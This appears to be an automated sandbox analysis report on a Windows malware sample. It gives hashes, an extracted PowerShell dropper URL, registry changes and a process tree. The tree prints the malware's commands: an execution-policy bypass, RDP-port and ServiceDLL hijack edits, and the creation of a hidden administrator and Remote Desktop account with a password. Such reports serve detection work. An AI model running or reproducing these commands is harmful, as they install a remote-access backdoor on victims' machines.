b3f483f00e80c0777858e6795f9f13bce726ff8265ef3e8cd3602cf1711247a2

Analysis

max time kernel
56s
max time network
152s
platform
windows10_x64
resource
win10v20210410
submitted
08-07-2021 16:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2b7720a936539736e36bb95fd6c61818.exe
Size

4.4MB
MD5

2b7720a936539736e36bb95fd6c61818
SHA1

b89323ad4d1f09227e097173420504f24e27e131
SHA256

b3f483f00e80c0777858e6795f9f13bce726ff8265ef3e8cd3602cf1711247a2
SHA512

d878072027b9aca3434c2b15cb4a3b4c9d097806719ac50ed731110faef2561fa179831804ad4624b7fa7b0fbd6f5927d5ab2fc078b918e13d21d88292f5bcad

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Core1 .NET packer 1 IoCs

Detects packer/loader used by .NET malware.

resource	yara_rule
behavioral2/memory/3972-119-0x000000001DF30000-0x000000001E55B000-memory.dmp	Core1

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
16	2264	powershell.exe
18	2264	powershell.exe
19	2264	powershell.exe
20	2264	powershell.exe
22	2264	powershell.exe
24	2264	powershell.exe
26	2264	powershell.exe
28	2264	powershell.exe
30	2264	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000900000001ab5c-227.dat	upx
behavioral2/files/0x000500000001ab65-228.dat	upx

Deletes itself 1 IoCs

pid	Process
4016	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
2076	Process not Found
2076	Process not Found

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3972 set thread context of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6B55.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6AE5.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kusx00kz.b4q.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qhgfcp1v.3t4.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6B66.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6B05.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6B25.tmp	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3680	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	19	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4016	powershell.exe
4016	powershell.exe
4016	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
3416	powershell.exe
3416	powershell.exe
3416	powershell.exe
784	powershell.exe
784	powershell.exe
784	powershell.exe
4016	powershell.exe
4016	powershell.exe
4016	powershell.exe
2264	powershell.exe
2264	powershell.exe
2264	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
612	Process not Found
612	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeIncreaseQuotaPrivilege	1808	powershell.exe
Token: SeSecurityPrivilege	1808	powershell.exe
Token: SeTakeOwnershipPrivilege	1808	powershell.exe
Token: SeLoadDriverPrivilege	1808	powershell.exe
Token: SeSystemProfilePrivilege	1808	powershell.exe
Token: SeSystemtimePrivilege	1808	powershell.exe
Token: SeProfSingleProcessPrivilege	1808	powershell.exe
Token: SeIncBasePriorityPrivilege	1808	powershell.exe
Token: SeCreatePagefilePrivilege	1808	powershell.exe
Token: SeBackupPrivilege	1808	powershell.exe
Token: SeRestorePrivilege	1808	powershell.exe
Token: SeShutdownPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeSystemEnvironmentPrivilege	1808	powershell.exe
Token: SeRemoteShutdownPrivilege	1808	powershell.exe
Token: SeUndockPrivilege	1808	powershell.exe
Token: SeManageVolumePrivilege	1808	powershell.exe
Token: 33	1808	powershell.exe
Token: 34	1808	powershell.exe
Token: 35	1808	powershell.exe
Token: 36	1808	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeIncreaseQuotaPrivilege	3416	powershell.exe
Token: SeSecurityPrivilege	3416	powershell.exe
Token: SeTakeOwnershipPrivilege	3416	powershell.exe
Token: SeLoadDriverPrivilege	3416	powershell.exe
Token: SeSystemProfilePrivilege	3416	powershell.exe
Token: SeSystemtimePrivilege	3416	powershell.exe
Token: SeProfSingleProcessPrivilege	3416	powershell.exe
Token: SeIncBasePriorityPrivilege	3416	powershell.exe
Token: SeCreatePagefilePrivilege	3416	powershell.exe
Token: SeBackupPrivilege	3416	powershell.exe
Token: SeRestorePrivilege	3416	powershell.exe
Token: SeShutdownPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeSystemEnvironmentPrivilege	3416	powershell.exe
Token: SeRemoteShutdownPrivilege	3416	powershell.exe
Token: SeUndockPrivilege	3416	powershell.exe
Token: SeManageVolumePrivilege	3416	powershell.exe
Token: 33	3416	powershell.exe
Token: 34	3416	powershell.exe
Token: 35	3416	powershell.exe
Token: 36	3416	powershell.exe
Token: SeDebugPrivilege	784	powershell.exe
Token: SeIncreaseQuotaPrivilege	784	powershell.exe
Token: SeSecurityPrivilege	784	powershell.exe
Token: SeTakeOwnershipPrivilege	784	powershell.exe
Token: SeLoadDriverPrivilege	784	powershell.exe
Token: SeSystemProfilePrivilege	784	powershell.exe
Token: SeSystemtimePrivilege	784	powershell.exe
Token: SeProfSingleProcessPrivilege	784	powershell.exe
Token: SeIncBasePriorityPrivilege	784	powershell.exe
Token: SeCreatePagefilePrivilege	784	powershell.exe
Token: SeBackupPrivilege	784	powershell.exe
Token: SeRestorePrivilege	784	powershell.exe
Token: SeShutdownPrivilege	784	powershell.exe
Token: SeDebugPrivilege	784	powershell.exe
Token: SeSystemEnvironmentPrivilege	784	powershell.exe
Token: SeRemoteShutdownPrivilege	784	powershell.exe
Token: SeUndockPrivilege	784	powershell.exe
Token: SeManageVolumePrivilege	784	powershell.exe
Token: 33	784	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3972 wrote to memory of 3516	3972	2b7720a936539736e36bb95fd6c61818.exe	75
PID 3516 wrote to memory of 4016	3516	vbc.exe	78
PID 3516 wrote to memory of 4016	3516	vbc.exe	78
PID 4016 wrote to memory of 200	4016	powershell.exe	80
PID 4016 wrote to memory of 200	4016	powershell.exe	80
PID 200 wrote to memory of 2700	200	csc.exe	81
PID 200 wrote to memory of 2700	200	csc.exe	81
PID 4016 wrote to memory of 1808	4016	powershell.exe	82
PID 4016 wrote to memory of 1808	4016	powershell.exe	82
PID 4016 wrote to memory of 3416	4016	powershell.exe	86
PID 4016 wrote to memory of 3416	4016	powershell.exe	86
PID 4016 wrote to memory of 784	4016	powershell.exe	88
PID 4016 wrote to memory of 784	4016	powershell.exe	88
PID 4016 wrote to memory of 3868	4016	powershell.exe	90
PID 4016 wrote to memory of 3868	4016	powershell.exe	90
PID 4016 wrote to memory of 3680	4016	powershell.exe	91
PID 4016 wrote to memory of 3680	4016	powershell.exe	91
PID 4016 wrote to memory of 1548	4016	powershell.exe	92
PID 4016 wrote to memory of 1548	4016	powershell.exe	92
PID 4016 wrote to memory of 2740	4016	powershell.exe	93
PID 4016 wrote to memory of 2740	4016	powershell.exe	93
PID 2740 wrote to memory of 1808	2740	net.exe	94
PID 2740 wrote to memory of 1808	2740	net.exe	94
PID 4016 wrote to memory of 2620	4016	powershell.exe	95
PID 4016 wrote to memory of 2620	4016	powershell.exe	95
PID 2620 wrote to memory of 3096	2620	cmd.exe	96
PID 2620 wrote to memory of 3096	2620	cmd.exe	96
PID 3096 wrote to memory of 2264	3096	cmd.exe	97
PID 3096 wrote to memory of 2264	3096	cmd.exe	97
PID 2264 wrote to memory of 2700	2264	net.exe	98
PID 2264 wrote to memory of 2700	2264	net.exe	98
PID 4016 wrote to memory of 3564	4016	powershell.exe	99
PID 4016 wrote to memory of 3564	4016	powershell.exe	99
PID 3564 wrote to memory of 3960	3564	cmd.exe	100
PID 3564 wrote to memory of 3960	3564	cmd.exe	100
PID 3960 wrote to memory of 852	3960	cmd.exe	101
PID 3960 wrote to memory of 852	3960	cmd.exe	101
PID 852 wrote to memory of 2116	852	net.exe	102
PID 852 wrote to memory of 2116	852	net.exe	102
PID 2740 wrote to memory of 3188	2740	cmd.exe	106
PID 2740 wrote to memory of 3188	2740	cmd.exe	106
PID 3188 wrote to memory of 4008	3188	net.exe	107
PID 3188 wrote to memory of 4008	3188	net.exe	107
PID 4088 wrote to memory of 784	4088	cmd.exe	110
PID 4088 wrote to memory of 784	4088	cmd.exe	110
PID 784 wrote to memory of 3188	784	net.exe	111
PID 784 wrote to memory of 3188	784	net.exe	111
PID 1196 wrote to memory of 184	1196	cmd.exe	114
PID 1196 wrote to memory of 184	1196	cmd.exe	114
PID 184 wrote to memory of 784	184	net.exe	115
PID 184 wrote to memory of 784	184	net.exe	115
PID 2668 wrote to memory of 3744	2668	cmd.exe	118
PID 2668 wrote to memory of 3744	2668	cmd.exe	118
PID 3744 wrote to memory of 184	3744	net.exe	119
PID 3744 wrote to memory of 184	3744	net.exe	119

C:\Users\Admin\AppData\Local\Temp\2b7720a936539736e36bb95fd6c61818.exe
"C:\Users\Admin\AppData\Local\Temp\2b7720a936539736e36bb95fd6c61818.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3972
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    3⤵
    - Deletes itself
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4016
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dlwq1e1q\dlwq1e1q.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:200
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32BE.tmp" "c:\Users\Admin\AppData\Local\Temp\dlwq1e1q\CSC95F082C67BEB46448823271B6863B47.TMP"
        5⤵
        
        PID:2700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:784
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      4⤵
      PID:3868
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      4⤵
      Modifies registry key
      PID:3680
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      4⤵
      PID:1548
  - - C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2740
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        5⤵
        
        PID:1808
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2620
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3096
      - C:\Windows\system32\net.exe
        
        net start rdpdr
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2264
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        7⤵
        
        PID:2700
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3564
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3960
      - C:\Windows\system32\net.exe
        
        net start TermService
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:852
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        7⤵
        
        PID:2116
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      4⤵
      PID:4244
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      4⤵
      PID:4260

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:4008

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 3AZsh4iD /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4088
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 3AZsh4iD /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 3AZsh4iD /add
    3⤵
    PID:3188

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:784

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2668
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    3⤵
    PID:184

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:784
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:3096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3744

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 3AZsh4iD
1⤵
PID:184
